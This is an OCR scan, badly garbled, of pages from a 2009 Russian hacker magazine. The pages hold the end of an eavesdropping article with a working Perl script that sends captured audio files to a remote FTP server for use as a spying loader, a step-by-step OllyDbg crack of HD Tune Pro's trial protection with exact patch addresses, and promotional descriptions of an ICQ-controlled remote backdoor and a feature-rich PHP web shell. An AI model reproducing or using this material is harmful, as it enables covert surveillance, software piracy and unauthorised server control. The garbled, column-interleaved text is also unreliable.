Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

129_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

15.04 Mб

Скачать

☆

<<< < Предыдущая 1 2 3 4 5 6 78 / 158 9 10 11 12 13 14 15 > Следующая >>>

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

ЗАБИРАЕМ НАЖИТОЕ :)

ярешилнемногоупроститьтвоюзадачу, выложивчасть	close LFILE;
своегоPerl-сорца:	closedir LDIR;
	$ftp->quit();
#!/usr/bin/perl
#!/usr/bin/perl

#print "================================== =\n";

#print "= Small FTP Loader = ";

#print "================================== =\n";

use Net::FTP;

$ftp_server = "blablabla.com"; #FTP-сервер $ftp_user = "user"; #логин на ftp-сервер $ftp_pass = "password"; #пароль на ftp-сервер

$ftp = Net::FTP->new("$ftp_server", Passive => 1);

$ftp->login("$ftp_user", "$ftp_pass"); $ftp->cwd('/domains/blablabla.com'); $ftp->binary(); $ftp->mkdir("/domains/blablabla.com/logs"); opendir(LDIR, "C:\\каталог_с_ аудиофайлами\\");#открываем каталог с аудиофайлами

$count=1;

while($filename = readdir LDIR){ if($count>2){ $ftp->put("C:\\каталог_с_

аудиофайлами\\$filename","/domains/ blablabla.com/logs/$filename"); #передаем все аудиофайлы из каталога на наш FTP-сервер

}

$count++;

}

Скрипт довольно прост и позволяет лишь копировать все содержимое конкретного каталога на удаленный FTP-сервер. Однако, модернизировав его и скомпилив в exe-файл (например, при помощи Perl2Exe), ты получишь простенький лоадер с вполне рабочим функционалом.

В общем, все зависит исключительно от тебя, твоих целей и средств (наличия прямых рук и светлой головы). Существует множество способов реализации «компьютерной» прослушки; я уже молчу о КПК, ведь софт под мобильные платформы никто не отменял, правда? А с наличием микрофонов на всех коммуникаторах и смартфонах проблем точно нет... но это уже совсем другая история.

НЕБОЛЬШОЙP.S.

Встатьеясознательнонесталраскрыватьвсеподробностиорганизациипрослушкивпланетарныхмасштабах, и томуестьнесколькопричин. Во-первых, подобныедействиячеткорегулируютсязаконодательством, аво-вторых, сутьвдругом. Яхотел, чтобытыпонял, насколькоуязвим каждыйизнасвповседневнойжизни, ипредпринялмеры пообеспечениюсобственнойбезопасности, — контролировалвсезвукозаписывающиеизвукопередающие устройствавимеющейсяутебятехнике. Конечно, об отключениимикрофонавтвоеммобильникеречинеидет, носкомпомвсегораздопроще:). Жертвовать ли удобством ради безопасности — решать тебе, но я надеюсь, ты сделаешь правильный выбор.z

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

INFO

info

Незабывайособственнойбезопасностиипомни, чтолюбой компьютероподобный девайсможетбыть использованвкачествесредстваскрытой звукозаписи!

DVD

dvd

УтилыMicSpy иMicSpy++ ты

найдешьнанашем диске. Кпервойиз нихдажеприлагаютсясорцы.

WARNING

info

Внимание! Информацияпредставлена исключительно сцельюознаком-

ления! Ниавтор, ни редакциязатвои действияответственностиненесут!

XÀÊÅÐ 09 /129/ 09

069

070

09 /129/ 09 ÐÅÊÀX

00433020

4330FA

GetSystemtimeToFille

43310A

GetSystemtimeToFille

433129

CALL 0043326F [обработка файлов]

433274

--------

[сколько осталось наших триал дней]

4332B3

JNE SHORT 0043330C

4332B2

MOV ESI, OFFSET TRIAL PERIOD EXPIRED

004157DB

JMP 00415880

45F663

433302

CALL 004108D0

43330A

JMP SHORT 00433328

	w	w				D
w						P
w								F
.								F
p	Click								-
f	Click								X
d									X
-			to						C
x			to						h
c				BUY					a
h				BUY					n
a									g
n					NOW!				e
n									E
g									E
e									d
.									i
c									i
o								t
	m			ВЗЛОМ		r	o
		MAKTRAXEP				r
		MAKTRAXEP

GreateWindowExA

0043330C

LEA EDX,[ESP+60]

433310 PUSH EDX DAY(S) LEFT

415821

[Начало]

RETRN

433320

CALL 0043C57A

415880

Push 58/Call 00462485

00461CC9

462982

SEH

00433328

LEA ECX,[ESP+0A0]

4158EB

Call 0045C516 [ создаем 2е окно-NAG]

text=ECX,hWnd=ECX+1C

462987

CALL 0043E58D

0043E58D

433336

CALL 00463355 ARG= или

Instal SE Handler

415A43

Push EXC(ESP+90)/ CALL 00461CC9 забиваем в кепшн

SetWindowTextA

433388 CALL 00463355 Unregisted Trial Version

главного "Trial

RETRN

HDD & NAG

4629ED

CALL 00462906

retrn

415ABE

Call 00415D30

Version"

00415D30

00462906

0046911D

GetParent

[Появляется

415D59

4629E2

MOV DWORD PTR

EnabledWindow (TRUE/FALSE)

кепшн главного

SS:[EBP-14],EAX

46292E

CALL 0046911D

GetWindowLongA

окна]

[меняется место

415ACF

CMP EAX,EDI

462936

CALL 045F28E

retrn

хэндла главного

415AD1

JL 00415C21

415D8A

CALL 0040FD60 [поверхностно-атрибуты HDD]

retrn

в стеке]

045F28E

415AD7

JG SHORT 00415AE5

id текущего

415DDE

[ESP+18]

462A07

IsWindowsEnabled? [EBN-14]

потока

GetCurrentThreadid

[ EAX > EDI: если нет

GetSystemTime

(main)

retrn

проблем с триал

415E66

CreateFileA

[IF EAX вернет 1 then...]

периодом т. е. выпол-

нится JG]

462A15

EnableWindow (FALSE) [EBP-14]

41600D

CALL 0040F650 [тип шины, имя/размер HHD]

TEST AL, AL, [Фильтруем:Только HDD/Flash]

4623A3A

CALL 00462693

00462693

JE 004160F8

462A38

CMP EAX,EDI EDI=1 / EAX=1 or 0

4624E1 CALL 00433020 (EDX+0BCh)

AL=0

4160BE

SendMessageA [забиваев в ComboBox]

id носителя

462A41

JE SHORT 00462A95 True-прыгаем

не есть HDD/

4160DE

CALL 004121F0 [продолжаем

через фунцию показа NAG

Flash

462A5E

CALL 004615C9

инициализацию HHD]

retrn

n.a.g.

CMP DWORD PTR DS:[ESI+1C],EDI

[возвращаемся к EBP-14]

4160F8

CMP EBP,5

JE SHORT 00462A95

не прыгаем

JNE SHORT 00416114

004615C9

[НАГлое окошко ]

4615FA

GetParent (ESI+1C)

только на 5м

41610D

CALL 00406930(1F, "Error get

0461DE5

заходе

disk info")

461610

UpdateWindows

ShowWindow [EXC+1C]

	00416114	CMP EBP,0C [12 в десятичной]		461630	CMP DWORD PTR SS:[ESP+10],EDI	[попрыгаем	retrn
		JNE SHORT 00416143	[готовим	461634	JE SHORT 00461648	и покажем	retrn
на 12м заходе		JNE SHORT 00416143	[готовим	461634	JE SHORT 00461648	и покажем
на 12м заходе			NAG]	46163A	CALL 00461DE5	окошко]
во владения	416125	CALL DWORD PTR DS: [EAX+088]	NAG]	46163A	CALL 00461DE5	окошко]
во владения	416125	CALL DWORD PTR DS: [EAX+088]		46163F	PUSH DWORD PTR
NAG		INC EBP; CMP EBP, 10; [ESP+10]=EBP			DS:[ESI+1C]
		INC EBP; CMP EBP, 10; [ESP+10]=EBP			[кинем хенл NAG на вершину стека]
		JL 00415DC6 [цикл, выполнится 16			[кинем хенл NAG на вершину стека]
		JL 00415DC6 [цикл, выполнится 16
		раз..]		4616C2	CALL 00461DE5	[запасной вызов NAG, на всякий
		MOV EAX ,DWORD PTR DS:[EBX+256A8]				[запасной вызов NAG, на всякий	00462A95	OR DWORD PTR SS:[EBN-4], FFFFFFFF
		MOV EAX ,DWORD PTR DS:[EBX+256A8]				пожарный ]
		TEST EAX,EAX				пожарный ]
		TEST EAX,EAX			RETRN			CMP DWORD PTR SS: [EBP-20],EDI
		JL SHORT 00416170			RETRN		462A9C	CMP DWORD PTR SS: [EBP-20],EDI
		MOV EAX,DWORD PTR DS:[EBX+0F14]					462A9C	JE SHORT 00462AA9
		MOV EAX,DWORD PTR DS:[EBX+0F14]						EnabledWindows (handle=[EBP-14])
		TEST EAX,EAX						EnabledWindows (handle=[EBP-14])
		TEST EAX,EAX					00462AA9 CMP DWORD PTR SS:[EBP-20],EDI
		JG SHORT 00416184					00462AA9 CMP DWORD PTR SS:[EBP-20],EDI
		JG SHORT 00416184					462AAC	JE SHORT 00462AC2
		JL SHORT 00416170					462AAC	JE SHORT 00462AC2
		JL SHORT 00416170						GetActiveWindow (handle=[EBP-14])
		CMP DWORD PTR DS:[EBX+0F10],1						GetActiveWindow (handle=[EBP-14])
		CMP DWORD PTR DS:[EBX+0F10],1					462AB7 MOV EAX,DWORD PTR DS:[ESI]
		JNB SHORT 00416184					462AB7 MOV EAX,DWORD PTR DS:[ESI]
		JNB SHORT 00416184
		MOV EAX,DWORD PTR DS:[EBX]					00462AC2
		MOV ECX,EBX					00462AC2
		MOV ECX,EBX						retrn
		CALL DWORD PTR DS:[EAX+0CB] (00417E70)						retrn
		CALL DWORD PTR DS:[EAX+0CB] (00417E70)				[оперируем с реестром ]
		MOV DWORD PTR DS:[EBX+256A8],0				[оперируем с реестром ]

RETRN	4108D0	ww	w				P
	RegOpenKey-RegCloseKey		w				D
							D
		.							F
		p								-
		f Click								X
		d								C
		-		to						C
		x		to						h
		h			BUY					a
		c								n
		a								g
		n				NOW!				e
		n								E
		g								E
		e								d
		.								i
		c								i
		o							t
		m					r	o
							r

				hang		e
			C			e	E
		X					E
	-							d
	F								i
	F								t
P	D								o
P	D					NOW!			r
					BUY	NOW!
				to	BUY
				to
w										m
w Click										m
	w							ХАРДКОРНЫЙ
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

ТЮНИНГ

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ИсследованиезащитыHDTunePRo

Наконец-торазработчикисофтасталиприслушиватьсякхакерам! Примитивныемодулипроверкирегистрациипостепенноуходят впрошлое. Протекторы, запутанныйиразбросанныйкодмодуля проверки, неявныевызовыпроцедур, громадноеколичествовызо-

вов, проверкафлагатрассировкииижесними. Этолишьпримерный списокинструментов, спомощьюкоторыхразработчикистроят, поих выражению, мощныеинепробиваемыезащиты! Нозачастуюреалии

далекиотсовершенства. Смотрисам.

	КАРТАПРОГРАММЫ:			днейдоокончания	00410B32 ипоследний— передвсплытием

				триалпериода),	NAG (адресостановкибудет00410С0F). После

	ÍD TUNE PRO 3.50	TRIAL VER, 15 DAYS, NAG		авглавномокне	нажатия«ОК» (вслучаеокончаниятриала)
				программыкрасу-	действияповторяются. Гм! Теоретическимы
	(C) ELF, ICQ: 7719116 & CJ, ICQ: 3708307			етсязаголовокTrial	стобоймоглибывзятьсязаразборименно
	Использовать только в познавательных целях!			version. Вобщем,	сэтогоместа, но, забегаявперед, скажу, что
				надеждынабыстрый	этолишьшестеренкавбольшойсистеме. Нам
				взломнет. Этовамне	важнобыстреньковосстановитьвесьмеханизм

				MessageBox! :).	отначалаидоконца.
	адумайся— многолиможнополучить,		Послепереводадатынатриднявпередпро-		ИНЪЕКЦИЯБРЯКОВ
	сломавпрогуправкойодногобайта,		граммапосчитала, что15 днейпрошлоидаже
	особенноеслиэтоправкавстиле		послеустановкилегальнойдатыяоказался		НадоискатьAPI, котораяответственназа
З«условныйпереходнабезусловный»?			соконченнымтриал-перидом. Мониторинг		созданиесамогоокнаNAG.
Наверняка, нет! Итакихпрограмм(какирас-			обращенийкрееструифайламтакженепринес		Перебираемнаиболееподходящиевспис-
тяп-программистов) большинство. Возникает			весомогорезультата— программаобращается		кеимпорта: CreateDialog сDialogBox. Таких
ощущение: содружествопрограммистовдавно			кслишкомбольшомуколичествуэлементови		нет! Значит, естьчто-тодругое. Окна, окна...
принялотакойподходкакмеждународный			анализироватьихутомительно.		Windows, CreateWindowExA (исходяизна-
стандарт! Нанашесчастьепопадаютсяисклю-			Ладно, каквидноизPEiD, ничегострашногоиз		звания, родственныеейAPI — ShowWindow,
чения, когдавреализациизащитывстречают-			протекторовнаснеожидает. Чтож, уженемного		EnableWindow, SetWindowTextA). А, вот, такая
сяпросветыкреативныхмыслей. Дабыпомочь			легче! ЗапускаемOllyDbg, грузимhdtunepro.		есть! Основнойвызовв0045F701 скучейпара-
восвоенииприемовпротивостоянияболее			exe. Дляпущейубедительностивотсутствии		метров. Здесьжевидимадрессамойфункции,
сложнымтехникамзащиты(вособенности,			антиотладкизапустимнавыполнение. Видим,		втелекоторойвызов— 0045F663. Естьсемь
быстромуисследованию), предлагаюокунуться			чтовсеработает! Теперьглавныйвопрос— с		мест, откудаонабудетвызвана. Чтобыузнать,
вэтисамыеэлементыкреативноготворчества.			чегоначать? Первое, чтопришловголову—		ктовызываетнашуфункцию, покаждомуместу
ВЫБОРЖЕРТВЫ			повторитьпримервзломаWinRAR 3.42 виспол-		вызоваможнопоставитьбряк.
			ненииКрисаКасперски. Сутьметодазаклю-		Попробуйпротрассируйиубедишься, что
НетсмыслаописыватьсамупрогуHdTunePro			чаласьвподавленииNAG припомощиправки		функцияCreateWindowExA будетвызванадва
3.50 — выборпродиктованлишьцелью			инструкциисравненияреальногоколичества		раза. Первыйразтыувидишьокновверхнем
исследованиязащиты. Дляначалапримерно			днейсчислом40. Внашемслучаеавторыока-		левомуглумонитораснулевойширинойи
определимся, счеммыимеемдело. Некоторые			залисьлюдьмижадными, ичислотаких дней		длиной(возможно, этоглавноеокнопрограм-
сейчасжескажут, чтонужновзятьPEiD ипро-			будет15. Тоесть, надонайтиинструкциюcmp		мы, котороепотомпринадобности, аточнее,
веритьфайлнаупакованность— это, конечно,			eax, 0Fh (число15 вhexе— этоF), котораянаси		приотсутствииунаспроблемстриалпериодом,
верно, нонесовсем!			выведеткNAG. Находимиставимбряки, ведь		будетустановленовнормальныйрежим). Авот
Сперванеобходимопростозапуститьиспол-			ихбольшечемодна(вообще, уменяих11).		второеокошко— этосозданиеNAG. Вовсяком
няемыйфайлиповерхностнопроанализиро-			Вмоемслучаепервыйбряксработалпоадресу		случае, оченьпохоже. Восстановимцепочку
ватьпринципработырегистрации. Создается			00410A55, значениерегистраeax возрастает		всеговызоваспомощьюинъектабряков— на
окошко, вбиваютсязначения(сколькоосталось			отнулядопятнадцати; затембрякпоадресу		каждомлокальномвызовефункцииA поставим

XÀÊÅÐ 09 /129/ 09

071

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P

				to	BUY						ВЗЛОМ
w Click				to						m
w Click										m
w
	w								o
	.								.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

DVD

dvd

НанашемDVD-но- сителележиткарта… нет, незабытых пиратскихсокровищ! Картаосновных действийпрограммы, связанныхтриалпериодом, ипос-

ледняянаданный

моментверсия ТРАССИРОВКАСУСЛОВИЕМ НЕХИТРЫЙТРЮКСТРИАЛОМ

OllyDbg.

HTTP://WWW

links

www.hdtunepro. com — сайтнашего пациента. www.ollydbg.de

— сайтотладчика

OllyDbg.

INFO

info

•Незабывайприиньектебряковписатьв комментариях, зачем ониздесьнужны— иначелегкозапутаться!

•Впрогах, наподобие нашейисследуемой, постарайсянайти начало(инициализациюформы) иконец (собственноNAG). Анализсерединыи окрестностейдажес неявнымивызовами будетнамноголегче.

•Держинастолебумагуиручку— составлятькартыпрограммы необходимодлянормальноговосприятия еедействий, атакже длявбыстрогопоиска нужноготебеадреса.

бряк. Запускаемпрограмму, гдебряксработал, смотрим	заменитьcaption?
теловызвавшейфункцииB иеелокальныевызовы. Также	Такчто— идемдалее! Адалееидеттривиальныйвызов
ставимнанихбрякиизапускаемопятьпрогу.	MessageBoxA сруганьюобобломепользователейсWindows
Вообще, смыслраскрутавсейцепочки, думаю, понятен	95\98\ME… Длятех, ктохочетсделатьнаоборот: наградить
(конечно, болееуниверсальныйметодприбольшомколи-	юзеровэтихверсийподдержкойнашейисследуемой
чествевызововиеслипозволяютмощностиЦП— ставить	программыиобломатьюзеров Windows XP, Vista — нужно
брякпоусловию, жать<Ctrl+T> итрассироватьсзаходомв	поадресу00415A57 исправитьJNE наJE. Толькогарантии
процедурыпо<Ctrl+F11>). Вопрос: докакогомоментавсе	работыпослеэтогона95\98\МЕявсеравнонедам.
этокрутить? Сейчасувидишь! Нашаподопытнаяфункция	ВСЕКРЕТНЫХ
вторичнобудетвызванапоадресу0045С552 втелефункции	ВСЕКРЕТНЫХ
0045С516. Упоследнейдвавозможныхлокальныхвызова,	ПОДЗЕМЕЛЬЯХ
изнихсработалтолько004158E8. Вот, кажется, иприехали!	Еслимызнаемпримерноеместо, гденадоискать(амыего
Последнийвызовпроисходитвтелегромаднойфункции	ужезнаем), тозачастуюхватаетвизуальногоанализадля
(остальныебылинеболее20 строкассемблерногокода).	определениязащитногомеханизма. Этосэкономитвремя,
Надобыеепросмотреть! Посленепродолжительного	авремя— деньги! Наличиекомментариев(дляаргумен-
скроллингавнизнатыкаемсяназаносвофсетуказате-	тов), которымиОльгаснабдилафункции, накартинкевыше
лянастроку«%s (trial version)» (00415A2B). Затембудет	говоритнам, чтоcall поадресу00415A50 долженпроверять
вызовфункциибезаргументов, ипотомвызовфункции	версиюOS, аcall 00415A1E береткэпшн(caption) глав-
саргументом(00415A43). Исходяизэтого, замечаем, что	ногоокнапредтем, какприклеитьтудасообщение«Trial
строка«%s (trial version)» должнагде-товсплыть. Особенно	Version». Видишь, тутвсевзаимосвязано!
еслиесть%s, — вместонеедолжнобытьзаданозначение. А	Тебявпервуюочередьдолжензаинтересоватьcall
незашифрованныестрокиговорятотом, чторазработчики	00415D30 (поадресу00415ABE). Скореевсего, функция
думаютчерезраз! Поперекрестнымссылкамможно, какпо	поадресу00415D30 должнабытьсвязанаслогическими
бульвару, добратьсядозащитногомеханизма. Этосущест-	дисками— внизуводномизаргументовкрасуется«No disk
венносэкономитвремя. Ноинтересныенамаргументы(Trial	found» (тривиальныйвызовMessageBoxA). Утебядолжны
version, trial period expired) расположеныдостаточнодалеко	возникнутьподозрения, чтоздесьбудетчто-тоинтерес-
друготдруга, какпоадресам, такипоходувыполнения. Не	ное. Наглазасразупопадаютсянесколькосравненийи
очень-тоудобно. Надосмотреть, чтопередаетсяваргумент	условныхпереходов, вдобавокперединтересующейнас
функции(содержимоеECX).	функцией— цепочкаприсваиваний(особенноинтересно,
Послевызовабезаргументнойфункцииидутинструкции	чтоздесьфигурируют1 и0 — похоженафлагрегистрации).
выталкиванияизстека12 байт, затемприсвоениеECX	Нуиповерхунас— операциис«trial version». Мотивации
содержимогостекасосмещением90h имногодругихнеин-	длядетальногоисследованиявполнедостаточно. Ну, ачто-
тересныхвещей. Короче, ставимбрякнааргументивидим,	бысделать100% мотивациюдляисследования— перейди
чтовстекепозаданномусмещениюнаходитсяHD Tune Pro	поадресу00415ABE, жминапробеливводиинструкцию
3.50 (trial version), чтоявляетсязаголовкомглавногоокна!	JMP 00415C2B (путьназначенияпереходабудетcall, отве-
АсамCALL 00461CC9 представляетсобойтривиальный	чающийзатривиальныйвызовAPI EnableWindow). Готово?
вызовSetWindowTextA (перейдипоадресуCall’а) — функ	Запускай! Нуичтомывидим? :).
ции, котораяизанесетновыйзаголовок. Афункциябез	Упс! НедоступноComboBox. Исправьpush 0 наpush 1, где
аргументовпростовставитвместо%s первичныйзаголовок	вызов— тривиальныйEnableWindow, окоторомречьшла
окнапрограммы. Каквидишь, теперьситуациянесколько	чутьвыше. Воттеперьвсе. Однаконасамомделеэтоеще
прояснилась. Дальшедолжнобытьинтересней! Тысейчас	далеконевсе! Собственно, вComboBox отсутствуютнаиме-
можешьвозразить— какжетак, мыпросмотрелисамое	нованиятвоихжесткихдисков. Агдеони? Полминутыназад
интересное, выходит, чтопрограммаужезнает, чтоверсия	тызаджампилфункциюихинициализацииивбиванияв
просроченаипеределалазаголовококна. Нуичто? Если	комбо! ТольковотнашNAG тоженепоявился!
брякинаcmp eax, 0Fh досихпорутебястоят, товидно, что	Догадываешься, почемутакпроисходит? Всепотому, что
ихвыполнениесработаетпослеподменызаголовкаглавно-	разработчикикомбинировалипроцедуруинициализации
гоокна. Даивообще— ктопомешаетпрогетакжеобратно	логическихдисковипоказNAG’аслогоокошка. Ты, конеч-

072	XÀÊÅÐ 09 /129/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

	PEID ВДЕЙСТВИИ. ПРОТЕКТОРОВИПАКОВЩИКОВ
ВХОДВСЕКРЕТНЫЕПОДЗЕМЕЛЬЯ	НЕНАБЛЮДАЕТСЯ
ВХОДВСЕКРЕТНЫЕПОДЗЕМЕЛЬЯ

РАССТАВЛЯЕМБРЯКИПОАДРЕСАМЛОКАЛЬНЫХ ВЫЗОВОВНАШЕЙФУНКЦИИ

РАЗРАБОТЧИКИЛЮБЯТИГРАТЬСРЕВЕРСЕРАМИВ ИГРУ«АОТКУДАВЫЗОВПРИШЕЛ?»

но, можешьзайтипоадресу00415D30 иначатьегоисследовать, номы зайдемстыла! Этобыстрееилучше. ИщибыстренькоAPI ShowWindow, котораяотвечаетзапоказNAG — уменябрякпередпоказомсработал поадресу00461DF3.

Единственное, начемещеможнонемногозаостритьвнимание, это использованиеEAX+1C какнекоторогостандартадляпередачиhandle- окнаAPI-функциямтипаEnableWindow. Естественно, длякаждогоокна будетсвойидентификатор. Так, послеустановкизаголовкаглавного окна«HD Tune Pro 3.50 (Trial Version)» содержимоеEAX+1C будетпе-

ренесеновСтек(EBP-14). КмоментупоказаNAG здесьсобственноуже будетхэндлокнаNAG. Восстановимцепочкувызовов, конецкоторой приводиткпоказулоготипаокошка. Этоможносделатьпостановкой бряковназавершениефункциии«single step» послеегосрабатывания. Итеперьмыокажемсянаинструкциюнижекоманды, котораявызвала подопытнуюфункцию.

00462982(00462A5E) -> 004615Ñ9(04613A) -> 00461DE5 (00461DF3)

Авототкудабудетвызвана00462982, мы, ксожалению, никакнеузнаем, таккак ниодинбрякнесработал:(. Впрочем, этодаженикакаянеошибка! Дляисправленияситуациипростоставимбрякпоадресу00462AE1 (RET), чтоявляетсяконцомнашейтекущейфункции, ипослеостановки инажатия<F8> (пошаговойтрассировки) мыинаходимнашадрес вызова(онбудетнаходитьсянаоднуинструкциювыше) — 00416125

скодомCALL DWORD PTR DS:[EAX+0B8] или, еслипоставитьбряки подсмотретьзначение, онобудетравняться«CALL 462982». Этоесть неявныйвызовфункции!

Всеэтоиспользуетсядлятого, чтобытакие, какмы, немоглибыстро восстановитьместоназначениявызоваи, какследствие, — сорватьвсю цепочку. Впрочем, еслиестьвозможность, можнопростоставитьбряк нанеявныйвызовипотомсмотреть, чтотамунасвстекеподанному смещению. ЕщеоднойнемаловажнойдетальюдлятебябудетисследованиеусловиядлявходавфункциюпоказаNAG. Вбольшинстве случаевключкразгадкекроетсяименнопередпрыжкомсусловием. Ну и, наконец, взгляни, гденаходитсявызов— этотелодоболизнакомой

XÀÊÅÐ 09 /129/ 09

ОПРЕДЕЛЯЕМПОЛОЖЕНИЕСИСТЕМНОЙБИБЛИОТЕКИUSER32 ВПАМЯТИНАШЕГОПРОЦЕССА

намфункцииинициализацииивбиваниявComboBox именлогических дисков, которуюмызаджампиливпрошлыйраз.

ЗАКЛЮЧЕНИЕ

Описывать все действия, которые делаются в этой нехитрой проге, нет нужды — уйдет целый журнал. Но ведь я тебе раскрыл самый главный смысл! Есть карта, а остальное можно разобрать самостоятельно.

Ялишьскажу, что, несмотрянавсеоружиесовременныхпрограммеров поборьбесозлостнымиреверсерами, взломзащиты— лишьделовремени. Этонепоколебимаяистина. Еслисмотретьсоднойстороны— то задостаточножуткийвидкода(диапазонвызововвтелеоднойфункции ограничиваетсятолькоеедлиной, неявныевызовы, нуиразбросан- ностьвсеготриал-модуля) разработчиковнадобыхорошенькоотшлепать! Сколькожмашинныхинструкцийтратитсянепоназначению! Где она— оптимизация?

С другой стороны, такая защита тянет на уверенную тройку — запутанность и неявные вызовы это, конечно, неплохо, но явных противодействий отладчику нет, равно как вызовы из системных библиотек открыты, можно свободно гулять по перекрестным ссылкам. Да, плюс ко всему, часть функций расположена строго друг за другом, что значительно упрощает анализ. А это только на руку таким реверсерам, как мы.z

073

hang

NOW!

Click

BUY

ВЗЛОМ

ЛЕОНИД «R0ID»

-xcha

					hang		e
				C			e	E
			X					E
		-							d
		F								t
		D								i
		D								r
	P						NOW!			o
	P
						BUY
					to	BUY
СТРОЙКОВ R0ID@BK.RU	w Click				to						m
	w Click										m
	w
		w								o
		.							.c
			p					g
				df			n		e
					-x cha

>> взлом

Программы для хакеров

ПРОГРАММА:ICQBLACKDOORALENKA ОС:WINDOWS2000/XP АВТОР:CA5PER&NEO][ACK

ЗаменарадминунабазеICQ

Вповседневнойработемычастоиспользуем дедики, своииличужие— такилииначе, все ихнужноконтролировать. Способовмасса

— начинаяотremote-десктопаизаканчивая Radmin’ом. Нокакбыть, еслихочетсяиметь доступксерверукруглосуточно? Регулярно таскатьссобойноутнеудобно, номобильник-то всегдавкармане:). Нет, яговорюнеореализа- цииremote-десктопадлямобильныхплатформ. Естьспособнамногопрощеиудобнее— утила

«ICQ Black Door Alenka». Тулзапозволяет управлятьудаленнымдедикомпосредством ICQ-протокола, используявкачествеклиента обычнуюасю. Дабыввеститебявкурсдела, рассмотримдоступныекомандысофтины:

-ShowDesk — отобразить иконки рабо- чего стола

-HideDesk — скрыть иконки на рабочем столе

-ShowStart — отобразить меню «Пуск»

-Hidestart — скрыть меню «Пуск»

-ShowTaskBar — отобразить таскбар

-HideTaskBar — скрыть таскбар

-ShowClock — отобразить часы

-HideClock — скрыть часы

-TimePC — узнать время юзера

-TimePowerPC — отобразить время работы сеанса юзера

-Command — список комманд

-Cdo — открыть CD/DVD-привод

-Сdc — закрыть CD/DVD-привод

-Info — информация

-Off — выключить комп

-Reboot — ребут компа

-Msl — клик левой кнопкой мыши

-Msr — клик правой кнопкой мыши

-Msm — клик средней кнопкой мыши

-Vk_enter — нажать enter

-Vk_escape — нажать escape

-Vk_space — нажать space

074

- DriveList — отобразить список дисков

- Getclb — получить буфер обмена (текст)

- Setclb: — добавить в буфер обмена (текст)

- Close — закрыть клиент

- GetProc — получить список процессов - ConPass — пароль соединения

- Author — инфа о разработчиках - Filelist: — список директорий и


файлов в выбранном каталоге				Функциональныйвеб-шелл
- Setcursor: — перемещение курсора
мыши в указанную точку
- Delfile: — удаление файла				палнаweb-шеллподзамысловатымназвани-
- Killdir: — удаление каталога				ем«PHPbaG-}\|{y]{-sHell». НаписаноннаPHP и
- Open: — открыть файл				веситпорядка100 Кб. Изосновныхвозможнос-
- Uploadfile: — залить файл на FTP				тейследуетвыделить:
- NumberHD: — задать жесткий диск
- OpenUrl: — открыть ссылку в дефолт-				- Файловый менеджер - наличие возмож-
ном браузере				ности визуального управления файла-
- SetWall: — параметры рабочего стола				ми, открытие/чтение/редактирование/
- KillProc: — убить процесс				загрузка/хекс-просмотр/копирование/
- GetPathProc — путь процесса				перемещение/удаление файлов
- OpenTXT: — прислать текст из файла				- Аплоад файлов — ограничение по раз-
- ScreenShot:<качество> — прислать				меру (2 метра)
скриншот экрана на FTP				- Редактор — редактирование любых
- Mail:<êîìó>,<îò êîãî>,<èìÿ îò				файлов, при наличии соответствующих
кого>,<тема письма>,<текст письма> —				ïðàâ
отправить письмо на мыло				- CMD — консоль
- MessageWarn:<Текст>,<Заголовок> —				- Бэкдоры — возможность установки в
вывести на десктоп юзера сообщение :)				системе перл/ехе bind-файлов
- CopyFile:<Старый файл>,<Новый				- Safe-mode — функции веб-шелла при
файл> — скопировать файл				работе с Safe_Mode ON
- CopyDir:<Старая директория>,<Куда				- SQL - стандартный модуль работы с
копировать> — скопировать каталог				базой данных
				- FTP - анонимный коннект с шела на
Утилаобладаетнеслабымфункционалом.				фтп-сервер
Конечно, полноценнозаменитьгуишный				- Mail — возможность анонимной от-
интерфейсонанесможет, однакозаменить				правки писем, а также возможность
консоль— вполне.				рассылки по собственному маил-листу
P.S. Юзатьтулзуилинет— решатьтебе, сорцы				- Evaler - интерпретатор пхп-кода в
найдешьнанашемдиске:).				системе
				- Сканеры — сканирование сервера на
				открытые порты, часто используемые

ПРОГРАММА:			PHPBAG-}\|{Y]{-SHELL	пароли, etc
ОС:	*NIX/WIN			- Крэкеры — брут пассов по словарю и
АВТОР:		WINNER13-ЖУК		методом перебора (Hash /SMTP/POP3/
Возвращаяськстаройдобройтрадиции— пуб-				IMAP/FTP/SNMP/MySQL/MSSQL/HTTP
ликациииописаниюразличныхweb-шеллов,				Form/HTTP Auth)
долженотметить, чтозапоследнеевремямне				- Pr0xy — встроенный анонимайзер
попалосьнесколькоинтересныхскриптовпо-				- Тулзы — набор полезных утил, та-
добногорода. Уместитьихвсеводномвыпуске				ких как: Whois, генерация файлов
Х-Тулзпопростуневозможно, поэтомувремяот				.htaccess/.htpasswd, etc
времениябудувыкладыватьнаиболееудачные				- Конвертация — конвертирование
экземплярынанашемдиске. Вэтотразвыбор				строк в md5, sha1, hex, etc

					XÀÊÅÐ 09 /129/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F									i
	F									t
P	D									o
P	D					NOW!				r
					BUY	NOW!
				to	BUY
				to
w											m
w Click										o	m
	w									o
	.								.c
